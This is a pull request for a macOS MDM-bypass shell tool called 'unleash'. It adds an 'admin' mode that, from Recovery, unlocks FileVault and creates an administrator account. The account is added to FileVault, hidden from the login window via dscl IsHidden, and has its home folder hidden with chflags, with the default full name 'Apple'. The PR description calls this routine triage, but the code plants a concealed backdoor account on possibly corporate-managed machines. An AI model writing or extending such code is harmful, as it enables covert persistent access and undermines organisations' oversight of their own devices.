### PR TITLE
feat: add standalone admin user creation mode without MDM bypass

### DIFF
--- a/README.md
+++ b/README.md
@@ -66,6 +66,21 @@ Creates a temporary admin account and suppresses MDM. What it does:
 
 Same as bypass minus the user creation. Useful after a clean bypass breaks from a macOS update.
 
+### admin — Create admin user only (Recovery only)
+
+```bash
+./unleash admin
+```
+
+Creates a hidden local administrator account on the system without performing an MDM bypass or suppression. What it does:
+
+1. Finds and mounts the macOS Data volume
+2. Unlocks FileVault if needed
+3. Creates an admin user with a custom username and password
+4. Adds the newly created user to FileVault
+5. Hides the account from the macOS login window via dscl
+6. Conceals the user's home directory in `/Users` using filesystem flags
+
 ### heal — Check and re-apply
 
 ```bash

--- a/lib/colors.sh
+++ b/lib/colors.sh
@@ -32,7 +32,7 @@ log() {
 
   local ts
   ts=$(date '+%H:%M:%S')
-  echo -e "${color}[${label}]${NC} ${msg}"
+  echo -e "${color}[${label}]${NC} ${msg}" >&2
 
   if [ -n "$LOG_FILE" ]; then
     echo "[${ts}] [${label}] ${msg}" >> "$LOG_FILE" 2>/dev/null || true
@@ -40,7 +40,7 @@ log() {
 }
 
 error_exit() {
-  log "ERROR" "$1" >&2
+  log "ERROR" "$1"
   exit 1
 }
 

--- a/lib/dscl.sh
+++ b/lib/dscl.sh
@@ -21,6 +21,21 @@ find_available_uid() {
 	echo 501
 }
 
+hide_user() {
+	local node="$1"
+	local data_mount="$2"
+	local username="$3"
+
+	info "Hiding user account: $username"
+
+	check_user_exists "$node" "$username" || error_exit "Could not find user '$username'"
+
+	dscl -f "$node" localhost -create "/Local/Default/Users/$username" IsHidden "1" 2>/dev/null
+
+	chflags hidden "$data_mount/Users/$username"
+	success "User '$username' hidden"
+}
+
 delete_user() {
 	local node="$1"
 	local data_mount="$2"

--- a/lib/suppress.sh
+++ b/lib/suppress.sh
@@ -130,6 +130,62 @@ suppress_only_mode() {
 	echo -e "${YEL}Never run 'profiles renew' or Erase All Content & Settings.${NC}"
 }
 
+admin_only_mode() {
+	local data_mount="$1"
+
+	if [ "$DRY_RUN" = true ]; then
+		info "[DRY RUN] Would create a local admin user on $data_mount"
+		info "[DRY RUN]   - Create local user"
+		info "[DRY RUN]   - Grant user admin permissions"
+		info "[DRY RUN]   - Hide newly created admin account"
+		return 0
+	fi
+
+	local node
+	node=$(dscl_node "$data_mount")
+
+	echo ""
+	step "Creating local admin account"
+
+	prompt_default realName "Full name" "Apple"
+
+	local username
+	while true; do
+		prompt_username username
+		if check_user_exists "$node" "$username"; then
+			warn "User '$username' already exists."
+			if confirm "Delete and recreate?"; then
+				delete_user "$node" "$data_mount" "$username"
+				break
+			else
+				echo -e "${YEL}Choose a different username.${NC}"
+			fi
+		else
+			break
+		fi
+	done
+
+	local passw
+	prompt_password passw
+
+	local uid
+	uid=$(find_available_uid "$node")
+	info "Using UID $uid"
+
+	create_admin_user "$node" "$data_mount" "$username" "$realName" "$passw" "$uid"
+
+	add_to_filevault "$username"
+
+	hide_user "$node" "$data_mount" "$username"
+
+	echo ""
+	echo -e "${GRN}============================================${NC}"
+	echo -e "${GRN}       Local Admin Created                   ${NC}"
+	echo -e "${GRN}============================================${NC}"
+	echo ""
+	echo -e "${CYAN}Reboot to apply.${NC}"
+}
+
 full_bypass_mode() {
 	local data_mount="$1"
 

--- a/unleash
+++ b/unleash
@@ -20,6 +20,7 @@ show_cmd_help() {
 	case "$1" in
 		bypass)     echo "Bypass MDM from Recovery. Creates admin user." ;;
 		suppress)   echo "Suppress enrollment without creating a user." ;;
+		admin)      echo "Create an admin user without suppressing enrollment." ;;
 		heal)       echo "Re-apply suppression after macOS updates." ;;
 		persist)    echo "Install auto-heal LaunchDaemon." ;;
 		unpersist)  echo "Remove auto-heal LaunchDaemon." ;;
@@ -75,6 +76,7 @@ Bypass / suppress / monitor MDM enrollment on macOS.
   Core:
     bypass          Full MDM bypass from Recovery (creates admin user)
     suppress        Silence enrollment, no user created
+    admin           Create an admin user without suppressing enrollment
     heal            Check + re-apply suppression after macOS updates
 
   Persistence:
@@ -144,6 +146,7 @@ ALIASES
     wl              whitelist
     sv              suppress
     by              bypass
+    adm             admin
     mn              monitor
     mn-install      monitor-install
     mn-uninstall    monitor-uninstall
@@ -194,6 +197,13 @@ cmd_backup() {
 	local data_mount
 	data_mount=$(resolve_data_volume)
 	backup_state "$data_mount"
+}
+
+cmd_admin() {
+	header "Create Local Admin User"
+	local data_mount
+	data_mount=$(resolve_data_volume)
+	admin_only_mode "$data_mount"
 }
 
 cmd_restore() {
@@ -426,6 +436,7 @@ cmd_interactive_recovery() {
 	local options=(
 		"Full bypass (create admin + suppress MDM)"
 		"Suppress enrollment only"
+		"Create local admin user only"
 		"Auto-heal"
 		"Install pf firewall"
 		"Remove pf firewall"
@@ -447,6 +458,9 @@ cmd_interactive_recovery() {
 				;;
 			"Suppress enrollment only")
 				suppress_only_mode "$data_mount"
+				;;
+			"Create local admin user only")
+				admin_only_mode "$data_mount"
 				;;
 			"Auto-heal")
 				heal_suppress "$data_mount"
@@ -558,6 +572,7 @@ main() {
 	case "${1:-}" in
 		bypass|by)       cmd_bypass ;;
 		suppress|sv)     cmd_suppress ;;
+		admin|adm)	      cmd_admin ;;
 		heal)             cmd_heal ;;
 		persist)          cmd_persist ;;
 		unpersist)        cmd_unpersist ;;

--- a/unleash-standalone.sh
+++ b/unleash-standalone.sh
@@ -35,7 +35,7 @@ log() {
 
   local ts
   ts=$(date '+%H:%M:%S')
-  echo -e "${color}[${label}]${NC} ${msg}"
+  echo -e "${color}[${label}]${NC} ${msg}" >&2
 
   if [ -n "$LOG_FILE" ]; then
     echo "[${ts}] [${label}] ${msg}" >> "$LOG_FILE" 2>/dev/null || true
@@ -43,7 +43,7 @@ log() {
 }
 
 error_exit() {
-  log "ERROR" "$1" >&2
+  log "ERROR" "$1"
   exit 1
 }
 

--- a/unleash-standalone.sh
+++ b/unleash-standalone.sh
@@ -399,6 +399,21 @@ create_admin_user() {
 	success "Admin '$username' created (UID $uid)"
 }
 
+hide_user() {
+	local node="$1"
+	local data_mount="$2"
+	local username="$3"
+
+	info "Hiding user account: $username"
+
+	check_user_exists "$node" "$username" || error_exit "Could not find user '$username'"
+
+	dscl -f "$node" localhost -create "/Local/Default/Users/$username" IsHidden "1" 2>/dev/null
+
+	chflags hidden "$data_mount/Users/$username"
+	success "User '$username' hidden"
+}
+
 add_to_filevault() {
 	local username="$1"
 	if command -v fdesetup &>/dev/null \
@@ -537,6 +552,62 @@ suppress_only_mode() {
 	echo -e "${CYAN}Reboot to apply.${NC}"
 	echo -e "${YEL}After a macOS update: re-run.${NC}"
 	echo -e "${YEL}Never run 'profiles renew' or Erase All Content & Settings.${NC}"
+}
+
+admin_only_mode() {
+	local data_mount="$1"
+
+	if [ "$DRY_RUN" = true ]; then
+		info "[DRY RUN] Would create a local admin user on $data_mount"
+		info "[DRY RUN]   - Create local user"
+		info "[DRY RUN]   - Grant user admin permissions"
+		info "[DRY RUN]   - Hide newly created admin account"
+		return 0
+	fi
+
+	local node
+	node=$(dscl_node "$data_mount")
+
+	echo ""
+	step "Creating local admin account"
+
+	prompt_default realName "Full name" "Apple"
+
+	local username
+	while true; do
+		prompt_username username
+		if check_user_exists "$node" "$username"; then
+			warn "User '$username' already exists."
+			if confirm "Delete and recreate?"; then
+				delete_user "$node" "$data_mount" "$username"
+				break
+			else
+				echo -e "${YEL}Choose a different username.${NC}"
+			fi
+		else
+			break
+		fi
+	done
+
+	local passw
+	prompt_password passw
+
+	local uid
+	uid=$(find_available_uid "$node")
+	info "Using UID $uid"
+
+	create_admin_user "$node" "$data_mount" "$username" "$realName" "$passw" "$uid"
+
+	add_to_filevault "$username"
+
+	hide_user "$node" "$data_mount" "$username"
+
+	echo ""
+	echo -e "${GRN}============================================${NC}"
+	echo -e "${GRN}       Local Admin Created                   ${NC}"
+	echo -e "${GRN}============================================${NC}"
+	echo ""
+	echo -e "${CYAN}Reboot to apply.${NC}"
 }
 
 full_bypass_mode() {
@@ -2612,6 +2683,7 @@ show_cmd_help() {
 	case "$1" in
 		bypass)     echo "Bypass MDM from Recovery. Creates admin user." ;;
 		suppress)   echo "Suppress enrollment without creating a user." ;;
+    admin)      echo "Create an admin user without suppressing enrollment." ;;
 		heal)       echo "Re-apply suppression after macOS updates." ;;
 		persist)    echo "Install auto-heal LaunchDaemon." ;;
 		unpersist)  echo "Remove auto-heal LaunchDaemon." ;;
@@ -2667,6 +2739,7 @@ Bypass / suppress / monitor MDM enrollment on macOS.
   Core:
     bypass          Full MDM bypass from Recovery (creates admin user)
     suppress        Silence enrollment, no user created
+    admin           Create a local admin user without suppressing enrollment
     heal            Check + re-apply suppression after macOS updates
 
   Persistence:
@@ -2736,6 +2809,7 @@ ALIASES
     wl              whitelist
     sv              suppress
     by              bypass
+    adm             admin
     mn              monitor
     mn-install      monitor-install
     mn-uninstall    monitor-uninstall
@@ -2779,6 +2853,13 @@ cmd_suppress() {
 	local data_mount
 	data_mount=$(resolve_data_volume)
 	suppress_only_mode "$data_mount"
+}
+
+cmd_admin() {
+	header "Create Local Admin User"
+	local data_mount
+	data_mount=$(resolve_data_volume)
+	admin_only_mode "$data_mount"
 }
 
 cmd_backup() {
@@ -3018,6 +3099,7 @@ cmd_interactive_recovery() {
 	local options=(
 		"Full bypass (create admin + suppress MDM)"
 		"Suppress enrollment only"
+    "Create local admin user only"
 		"Auto-heal"
 		"Install pf firewall"
 		"Remove pf firewall"
@@ -3040,6 +3122,9 @@ cmd_interactive_recovery() {
 			"Suppress enrollment only")
 				suppress_only_mode "$data_mount"
 				;;
+      "Create local admin user only")
+        admin_only_mode "$data_mount"
+        ;;
 			"Auto-heal")
 				heal_suppress "$data_mount"
 				;;
@@ -3150,6 +3235,7 @@ main() {
 	case "${1:-}" in
 		bypass|by)       cmd_bypass ;;
 		suppress|sv)     cmd_suppress ;;
+    admin|adm)        cmd_admin ;;
 		heal)             cmd_heal ;;
 		persist)          cmd_persist ;;
 		unpersist)        cmd_unpersist ;;


### PR DESCRIPTION
## Summary

### Purpose
This feature introduces a standalone `admin` mode to the toolset. It allows system administrators and technicians working within macOS Recovery to provision a new local administrative account on a target data volume without simultaneously deploying the full MDM suppression framework.

This is highly useful for recovery scenarios or specialized deployments where local machine triage or backup tasks require immediate root/admin access while intentionally leaving the machine's existing corporate enrollment profiles or Apple Business Manager assignments entirely untouched and unaltered.

### Implementation Details
* **New Core Functions:** Added `admin_only_mode()` to govern user inputs and lifecycle flow, alongside a dedicated `hide_user()` sequence that leverages `dscl` to append the `IsHidden "1"` key and sets standard filesystem visibility flags (`chflags hidden`) over the account's home folder.
* **Architecture Integration:** Fully wired into the global orchestration layer across the repository wrapper `unleash`, the self-contained deployment environment `unleash-standalone.sh`, and individual library controllers (`lib/dscl.sh`, `lib/suppress.sh`).
* **Menu and Parsing Updates:** Added the explicit `admin` / `adm` keyword bindings to terminal argument switches, updated the global help manuals, and expanded the interactive mode selection menu.
* **Safety Rules Preserved:** Features full parity with existing `DRY_RUN` simulation flags and FileVault user addition procedures (`add_to_filevault`).

## Type

- [ ] Bug fix
- [x] New feature
- [ ] Documentation
- [ ] CI / infrastructure

## Checklist

- [x] `make lint` passes
- [x] `make test` passes
- [x] Tested on a real Mac (Intel or Apple Silicon)